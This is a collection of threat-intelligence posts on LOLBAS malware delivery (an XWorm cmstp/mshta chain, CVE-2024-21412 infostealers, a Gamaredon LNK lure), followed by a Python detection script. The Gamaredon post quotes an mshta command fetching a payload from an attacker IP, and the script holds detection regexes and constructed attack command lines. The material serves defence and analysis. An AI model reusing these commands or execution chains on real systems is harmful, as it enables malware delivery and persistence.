ClickFix: How to Infect Your PC in Three Easy Steps – Krebs on Security

ClickFix: How to Infect Your PC in Three Easy Steps - A clever malware deployment scheme first spotted in targeted attacks last year has... https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/ #u.s.departmentofhealthandhumanservices #microsoftwindows #microsoftoffice #googlechrome #booking.com #arcticwolf #proofpoint #mshta.exe #clickfix #facebook #other
🚨 #XWorm leverages LOLBAS techniques to abuse #CMSTPLUA

CMSTPLUA is a legitimate Windows tool that can be exploited for system binary proxy execution using #LOLBAS techniques, bypassing security controls like #UAC, and executing #malicious code, putting organizations at risk.

⚙️ With Script Tracer in #ANYRUN Sandbox, a SOC team can analyze scripts more efficiently. It simplifies script breakdowns, making it easier to understand their behavior and get key insights.
The #script embedded in the INF file is used to coordinate an execution chain:
1️⃣ EXE starts cmstp.exe which is used to launch a #malicious script from an #INF file.

2️⃣ CMSTPLUA ➡️ mshta.exe ➡️ cmd.exe ➡️ EXE ➡️ PowerShell
#MSHTA loads a #VBScript from memory to run an executable and shuts down the #CMSTP process.
– EXE launches #PowerShell to add itself to #MicrosoftDefender exceptions.

3️⃣ Finally, it runs the XWorm #payload from the #System32 directory and adds itself to the Scheduled Tasks for persistence.

👨‍💻 Check out the analysis and see Script Tracer in action:
https://app.any.run/tasks/9352d612-8eaa-4fac-8980-9bee27b96bce/?utm_source=mastodon&utm_medium=post&utm_campaign=cmstplua&utm_term=130225&utm_content=linktoservice

Living-off-the-Land techniques have been leveraged for years to execute malicious operations using legitimate system utilities.
Use these TI Lookup search queries to find similar samples and improve the efficiency of your organization's security response:
🔍 https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=cmstplua&utm_content=linktoti&utm_term=130225#%7B%2522query%2522:%2522commandLine:%255C%2522%255C%255C.inf%255C%2522%2520AND%2520imagePath:%255C%2522cmstp%255C%255C.exe$%255C%2522%2522,%2522dateRange%2522:180%7D
🔍 https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=cmstplua&utm_content=linktoti&utm_term=130225#%7B%2522query%2522:%2522commandLine:%255C%2522mshta%2520vbscript:%255C%2522%2522,%2522dateRange%2522:180%7D

Analyze latest #malware and #phishing threats with #ANYRUN 🚀

#cybersecurity #infosec

Analysis SystemSettings.exe (MD5: 701A94F53D54D38A11F4E60BC4F95B18) Malicious activity - Interactive analysis ANY.RUN

Interactive malware hunting service. Live testing of most types of threats in any environment. No installation and no waiting necessary.

Internet Shortcut file security feature bypass vulnerability exploited for over a year; attackers use it to distribute several infostealers | iThome

Link 📌 Summary:
Microsoft patched the Internet Shortcut file security feature bypass vulnerability CVE-2024-21412 in this year's February routine update, but attackers have been exploiting the flaw to distribute several kinds of infostealers, with attacks spanning North America, Spain and Thailand. Security vendor Fortinet found in its analysis that the attackers craft malicious URL files pointing to a specific remote server, download an LNK file onto the victim's computer, and lure the victim into executing it, thereby advancing the attack. Researchers observed the attackers using two different code-injection tools to bypass defenses, ultimately planting infostealers on the victim's computer.

🎯 Key Points:
1. Microsoft patched the Internet Shortcut file security feature bypass vulnerability CVE-2024-21412 in February this year, but attackers are exploiting it to distribute infostealers.
2. Security vendor Fortinet found that the attackers craft malicious URL files pointing to a specific remote server and lure victims into executing them to advance the attack.
3. Researchers observed the attackers using two code-injection tools, ultimately planting infostealers on the victim's computer.
4. Fortinet found that the attackers use the Steam Community website as a Dead Drop Resolver to hide the C2 source.

🔖 Keywords:
#CVE-2024-21412
#Fortinet
#Water Hydra
#Lumma Stealer
#Meduza Stealer
#ACR Stealer
#PowerShell
#HTA script
#Edge executable icon
#LNK file
#forfiles
#mshta
#Imghippo
#GdipBitmapGetPixel
#HijackLoader
#Steam Community website
#Dead Drop Resolver
#Docker
#AuthZ
#OpenAI
#GPT-4o mini
#Meta Llama 3

Internet Shortcut file security feature bypass vulnerability exploited for over a year; attackers use it to distribute several infostealers

Regarding the zero-day vulnerability CVE-2024-21412 that Microsoft disclosed in February this year, a new investigation indicates that attackers have been using it to distribute infostealers for far longer than previously disclosed, possibly more than a year

iThome

A very fresh #Gamaredon TA sample from today (Jan 23, 2022) targeting the Directorate General For Rendering Services To Diplomatic Missions of #Ukraine:

Original email: afb612d08112c036628a29ed8d4bd4550ca7cfed2582e2f432f2283a9b507f15

Attachment:
d124919de870b5974639ba24dd80709ed890119bdec4ba6a6179464fca4ef952 *Запит.tar

Extracted malicious LNK:
600ef7861ad03b434d98312a4133dc33fa1944f43c2e558044dfcdb342803147 *Відповідно_до_статті_20_Закону,_просимо_надати_відповідь_протягом_5_робочих_днів_з_дня_отримання_запиту.lnk
dropping a next stage #vbscript via #mshta

%windir%\system32\mshta[.]exe http://194.180.174[.]203/23.01/mo/baseball[.]DjVu

284bd873c840415ee24738f0a866b558d51f5f58b6bf29fb2818ffb819f9bd04 *baseball.DjVu

Once deobfuscated it leads to a #Telegram channel providing the next-stage IP:
b7422446c22baee16c6c9c00a82610f739b836648ffce070bbd6c932db5416f5 *baseball.DjVu.deobfuscated

We have a full paper of this Telegram multi-staging technique published last week here: https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations

Gamaredon (Ab)uses Telegram to Target Ukrainian Organizations

The Gamaredon Group has been actively targeting the Ukrainian government lately, relying on the infrastructure of the popular messaging service Telegram to bypass traditional network traffic detection techniques without raising obvious flags. This new report from BlackBerry provides an analysis.

BlackBerry
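The ANY.RUN post above describes an execution chain (cmstp.exe loading a script from an INF file, then mshta.exe running an inline VBScript) and gives two TI Lookup queries for it, and the Gamaredon post shows mshta.exe fetching a remote file over HTTP. The following is an added example, not code from ANY.RUN, BlackBerry or any of the posters, showing how a defender could turn those three patterns into detection rules and run them over process-creation records. The tab-separated record format, the rule names, and every event line (including the 203.0.113.5 documentation address and the placeholder script body) are constructed for this example.

```python
"""Flag the LOLBAS process-creation patterns described in the posts above.

Constructed example: the event lines below are made-up, tab-separated
(Image, ParentImage, CommandLine) records in the spirit of a Sysmon
Event ID 1 export. The rule names and helper functions are this
example's own, not ANY.RUN's or BlackBerry's.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process (kept for triage)
    command_line: str   # raw command line as logged


# Each rule is (name, image regex, command-line regex). The first two mirror
# the TI Lookup queries in the ANY.RUN post (cmstp.exe with a .inf argument;
# mshta with an inline vbscript: handler); the third covers the remote-URL
# form seen in the Gamaredon sample.
RULES = (
    ("cmstp_inf_proxy_execution",
     re.compile(r"\\cmstp\.exe$", re.I),
     re.compile(r"\.inf\b", re.I)),
    ("mshta_inline_script",
     re.compile(r"\\mshta\.exe$", re.I),
     re.compile(r"\b(?:vbscript|javascript):", re.I)),
    ("mshta_remote_content",
     re.compile(r"\\mshta\.exe$", re.I),
     re.compile(r"\bhttps?://", re.I)),
)


def parse_event(line: str) -> ProcessEvent:
    """Parse one 'image<TAB>parent<TAB>commandline' record."""
    image, parent, cmdline = line.rstrip("\n").split("\t", 2)
    return ProcessEvent(image, parent, cmdline)


def match_rules(event: ProcessEvent) -> list[str]:
    """Return the names of every rule whose image and command-line regexes both hit."""
    return [name for name, image_re, cmd_re in RULES
            if image_re.search(event.image) and cmd_re.search(event.command_line)]


def scan(lines) -> dict[int, list[str]]:
    """Return {record_index: [rule names]} for every record that matched at least one rule."""
    results = {}
    for idx, line in enumerate(lines):
        hits = match_rules(parse_event(line))
        if hits:
            results[idx] = hits
    return results


# Constructed records (not real telemetry). The paths and the dropper name are
# illustrative only.
SAMPLE_LINES = [
    # 0: cmstp.exe loading a dropped INF profile (step 1 of the XWorm chain)
    "C:\\Windows\\System32\\cmstp.exe\tC:\\Users\\user\\Downloads\\dropper.exe"
    "\tcmstp.exe /au C:\\Users\\user\\AppData\\Local\\Temp\\profile.inf",
    # 1: mshta running an inline VBScript handler (step 2 of the XWorm chain)
    "C:\\Windows\\System32\\mshta.exe\tC:\\Windows\\System32\\dllhost.exe"
    "\tmshta vbscript:Execute(\"<constructed placeholder>\")",
    # 2: mshta fetching remote content, as in the Gamaredon LNK stage
    "C:\\Windows\\System32\\mshta.exe\tC:\\Windows\\explorer.exe"
    "\tC:\\Windows\\system32\\mshta.exe http://203.0.113.5/stage/baseball.DjVu",
    # 3: benign mshta use of a local help file; should not match
    "C:\\Windows\\System32\\mshta.exe\tC:\\Program Files\\Vendor\\app.exe"
    "\tmshta.exe \"C:\\Program Files\\Vendor\\help.hta\"",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LINES).items():
        ev = parse_event(SAMPLE_LINES[idx])
        print(f"[{idx}] {', '.join(hits)}  parent={ev.parent_image}")
```

The parent image is carried through deliberately: cmstp.exe with a .inf argument is also how legitimate connection-manager profiles are installed, so a hit on `cmstp_inf_proxy_execution` is best triaged on who spawned it (a user-writable path such as Downloads or Temp versus a known installer) rather than suppressed outright. The two mshta rules have far fewer benign matches in most environments and can usually be alerted on directly.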